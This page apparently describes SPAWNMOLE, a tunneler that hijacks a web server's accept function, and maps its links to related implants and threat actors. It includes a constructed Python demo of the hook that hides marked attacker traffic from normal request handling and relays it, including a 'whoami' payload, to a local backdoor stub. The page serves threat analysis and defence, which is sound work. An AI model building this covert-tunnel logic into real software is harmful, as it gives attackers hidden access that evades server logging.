
SPAWNMOLE (6c89c51f-1b97-4966-abc1-9cf526bb2892)

SPAWNMOLE is a tunneler that injects into the web process. It hijacks the accept function in the web process so that every inbound connection passes through its hook: the hook inspects the initial bytes, filters out the traffic originating from the attacker, and passes the remaining benign traffic unmodified to the legitimate web server functions. The attacker's traffic is instead tunneled to a host and port that the attacker supplies in the request buffer. Mandiant assesses that the attacker would most likely pass a local port on which SPAWNSNAIL is listening, using SPAWNMOLE as the externally reachable path to that backdoor.
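The routing decision described above, modelled as an added example (not SPAWNMOLE's code, and not code from Mandiant or the MISP project). Mandiant's description gives no byte-level detail of the trigger, so the marker MAGIC, the hypothetical framing (marker, host, port, then payload), the loopback "backdoor" stub and the sample requests are all constructed here for illustration. The hooked accept peeks at the first bytes without consuming them, hands unmarked connections to the ordinary request handler, and relays marked connections to the host and port named in the buffer:

```python
import select
import socket
import struct
import threading

# Hypothetical trigger marker and framing, constructed for this demo only.
# Framing: MAGIC | u8 host_len | host | u16 big-endian port | tunneled payload
MAGIC = b"\x00SPWN"


def parse_tunnel_target(buf):
    """Return (host, port, header_len) if buf carries the constructed attacker
    framing, else None. header_len lets the tunnel strip the routing header."""
    if not buf.startswith(MAGIC) or len(buf) < len(MAGIC) + 1:
        return None
    hlen = buf[len(MAGIC)]
    end = len(MAGIC) + 1 + hlen
    if len(buf) < end + 2:
        return None
    host = buf[len(MAGIC) + 1:end].decode("ascii", "replace")
    (port,) = struct.unpack("!H", buf[end:end + 2])
    return host, port, end + 2


def legitimate_handler(conn):
    """Stand-in for the real web server's request handling (constructed)."""
    conn.recv(4096)
    conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")
    conn.close()


def tunnel(conn, host, port, header_len):
    """Forward the attacker's payload (minus the header) to host:port, relay the reply."""
    payload = conn.recv(4096)[header_len:]  # the peeked bytes, now consumed
    with socket.create_connection((host, port), timeout=2) as back:
        back.sendall(payload)
        back.shutdown(socket.SHUT_WR)
        reply = b""
        while chunk := back.recv(4096):
            reply += chunk
    conn.sendall(reply)
    conn.close()


def hooked_accept(listener):
    """Model of the hijacked accept(): peek, classify, route. Returns the decision."""
    conn, _ = listener.accept()
    conn.settimeout(2)
    readable, _, _ = select.select([conn], [], [], 2)
    head = conn.recv(4096, socket.MSG_PEEK) if readable else b""
    target = parse_tunnel_target(head)
    if target is None:
        legitimate_handler(conn)  # benign traffic flows on untouched
        return "passthrough"
    tunnel(conn, *target)  # attacker traffic never reaches the web server logic
    return "tunnel"


def fake_backdoor(listener):
    """Loopback stub standing in for a local backdoor listener (constructed)."""
    conn, _ = listener.accept()
    data = b""
    while chunk := conn.recv(4096):
        data += chunk
    conn.sendall(b"backdoor got: " + data)
    conn.close()


def client(port, payload, out):
    with socket.create_connection(("127.0.0.1", port), timeout=2) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        reply = b""
        while chunk := s.recv(4096):
            reply += chunk
    out.append(reply)


def run_demo():
    """Push one benign and one marked connection through the hooked accept.
    Returns ([decision, decision], [reply, reply])."""
    back_l = socket.socket(); back_l.bind(("127.0.0.1", 0)); back_l.listen(1)
    web_l = socket.socket(); web_l.bind(("127.0.0.1", 0)); web_l.listen(2)
    back_port, web_port = back_l.getsockname()[1], web_l.getsockname()[1]
    threading.Thread(target=fake_backdoor, args=(back_l,), daemon=True).start()

    host = b"127.0.0.1"
    attacker_msg = MAGIC + bytes([len(host)]) + host + struct.pack("!H", back_port) + b"whoami\n"
    benign_msg = b"GET / HTTP/1.1\r\nHost: vpn.example.test\r\n\r\n"  # constructed sample

    decisions, replies = [], []
    for msg in (benign_msg, attacker_msg):
        out = []
        t = threading.Thread(target=client, args=(web_port, msg, out))
        t.start()
        decisions.append(hooked_accept(web_l))
        t.join(timeout=5)
        replies.append(out[0] if out else None)
    web_l.close(); back_l.close()
    return decisions, replies


if __name__ == "__main__":
    print(run_demo())
```

The point of the peek is that the legitimate server code still sees the full, unmodified request for benign clients, which is what makes the hook invisible to ordinary traffic and to access logging downstream of it. A defender looking for this class of implant therefore cannot rely on web server logs alone: the attacker's connections are diverted before the server's own request handling runs.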

Cluster A                                          | Galaxy A     | Cluster B                                          | Galaxy B     | Level (hops from SPAWNMOLE)
---------------------------------------------------|--------------|----------------------------------------------------|--------------|----------------------------
SPAWNMOLE (6c89c51f-1b97-4966-abc1-9cf526bb2892)   | Tool         | SPAWNSNAIL (de390f3e-c0d1-4c70-b121-a7a98f7326aa)  | Backdoor     | 1
SPAWNMOLE (6c89c51f-1b97-4966-abc1-9cf526bb2892)   | Tool         | UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)     | Threat Actor | 1
SPAWNMOLE (6c89c51f-1b97-4966-abc1-9cf526bb2892)   | Tool         | SPAWNANT (e6cf28a6-94a9-4aab-b919-ad2f6a7e3b87)    | Tool         | 1
SPAWNSNAIL (de390f3e-c0d1-4c70-b121-a7a98f7326aa)  | Backdoor     | SPAWNSLOTH (2c237974-edc2-460a-90b5-20f699560da3)  | Tool         | 2
SPAWNSNAIL (de390f3e-c0d1-4c70-b121-a7a98f7326aa)  | Backdoor     | UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)     | Threat Actor | 2
SPAWNSNAIL (de390f3e-c0d1-4c70-b121-a7a98f7326aa)  | Backdoor     | SPAWNANT (e6cf28a6-94a9-4aab-b919-ad2f6a7e3b87)    | Tool         | 2
UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)     | Threat Actor | SPAWNANT (e6cf28a6-94a9-4aab-b919-ad2f6a7e3b87)    | Tool         | 2
SPAWNSLOTH (2c237974-edc2-460a-90b5-20f699560da3)  | Tool         | UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)     | Threat Actor | 2
UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)     | Threat Actor | UTA0178 (f288f686-b5b3-4c86-9960-5f8fb18709a3)     | Threat Actor | 2
BRICKSTORM (64a0e3ab-e201-4fdc-9836-85365dfa84bb)  | Backdoor     | UTA0178 (f288f686-b5b3-4c86-9960-5f8fb18709a3)     | Threat Actor | 3
UTA0178 (f288f686-b5b3-4c86-9960-5f8fb18709a3)     | Threat Actor | ROOTROT (69d0512d-c12a-4e17-a335-deba012a8499)     | Tool         | 3